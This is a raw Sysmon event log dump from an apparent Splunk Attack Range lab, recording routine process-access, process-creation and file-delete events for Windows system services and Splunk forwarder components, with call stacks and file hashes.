11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-17DD-6216-1B05-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221588Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221587Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17DD-6216-1B05-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221586Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.609{4F8D34B0-17DD-6216-1B05-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.577{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=865111D9CA4927ABBC51ADDAFC66264A,SHA256=9B54C4F8492AAFD2EF55FEF726B4CE0127F96976935F3C01E903A3A7297BAC39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:49.096{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F775D96519D2B94015275B63FAF3647,SHA256=C3A4DC803E230E484B10FF85E33C8C290D4EA17E7E4BD48B73D67936931CF2CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.343{4F8D34B0-17DD-6216-1A05-000000003902}33922712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17DD-6216-1A05-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-17DD-6216-1A05-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.093{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17DD-6216-1A05-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.094{4F8D34B0-17DD-6216-1A05-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:50.593{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 